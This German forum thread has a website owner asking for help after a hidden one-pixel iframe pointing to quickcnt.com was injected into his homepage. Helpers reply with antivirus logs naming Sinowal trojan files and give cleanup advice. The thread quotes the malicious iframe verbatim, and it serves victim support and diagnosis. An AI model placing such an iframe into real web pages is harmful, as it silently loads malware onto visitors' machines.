iframe Virus schreibt sich in index.html Seiten
 

Hallo, ich habe bemerkt, dass sich bei Anklicken einiger von mir erstellten Internetseiten folgender Code hinter den Body-Tag geschrieben hat und sich dieser bei Aufruf der Seiten im Internet aktivieren will:

<iframe src='http://quickcnt.com/ld/axhst/' width='1' height='1' style='visibility: hidden;'></iframe>

Mein Kaspersky im Büro meldet mir ebenso einen Trojaner, wie mein ZoneAlarm zuhause.

Gebaut habe ich die Seiten am Büro-PC, dieser ist laut Kaspersky 6 aber nicht infiziert.

Wenn ich den schädlichen Code aus der Seite lösche ist alles wieder gut.
Der Code schreibt sich nur in die Startseite, und nicht in andere, die ich verändert habe.

Woran kann das liegen, und was kann ich dagegen tun?

Vielen Dank, Marcus

Was genau melden die wo?!

Meine ZoneAlarm Meldung:
http://www.mechagodzilla.de/zonealarm.jpg

Jetzt wären noch die genauen Dateipfade und Namen intressant denn die kann man deiner Grafik nicht entnehmen ;)

Dan noch ein
http://www.trojaner-board.de/17493-a...ijackthis.html

sorry, hier das Bild auch ganz :)
http://www.mechagodzilla.de/zonealarm2.jpg

Hijack hat nichts gefährliches gefunden

Das ist merkwürdig, vielleicht ein Fehlalarm, lad die Dateien mal bei Virustotal hoch.

Hab ich noch vergessen: Poste das Logfile von HJT ;)

auch negativ, findet nichts. Aber wie kann sich Code in eine HTML-Seite einschreiben und speichern, sodass jeder User die Virenmeldung bekommt?

hier das Logfile (habe ich auch schon auf der hijack Seite gecheckt)

...Ahm, sorry, aber wer ist denn Britta? Nämlich sie soll sich einloggen und den Ordner Temporary Internet Files in ihrem Profil leeren: Löschen des Inhalt des Ordners "Temporary Internet Files"

Durch den Downloader wird dir eine Sinowal Variante untergeschoben. Combofix kann diese sehr gut loeschen.
F:\gioPool\ibm00004.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.5
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\ibm00003.dll.vir
[FUND] Ist das Trojanische Pferd TR/PSW.Sinowal.CP.7
[WARNUNG] Die Datei wurde ignoriert.
F:\gioPool\a.exe.vir
[FUND] Ist das Trojanische Pferd TR/Obfuscated.FV.6
[WARNUNG] Die Datei wurde ignoriert.

Britta ist meine Frau, meinst du, sie ist der Virus? :Boogie:

Temporary Internet Files habe ich gelöscht. Ist mir trotzdem ein Rätsel, wie diese HTML-Code Änderungen passieren konnte....

Das kann ich aus der Ferne schlecht beurteilen :D. Was ich im Bild sehe - das Problem wurde aus ihrem IE-Profil gemeldet.
Im Profil deiner Frau - auch? ;)
Alles hängt vom Verhalten des Benutzers und den Einstellungen der Programme, die im Internet gehen dürfen.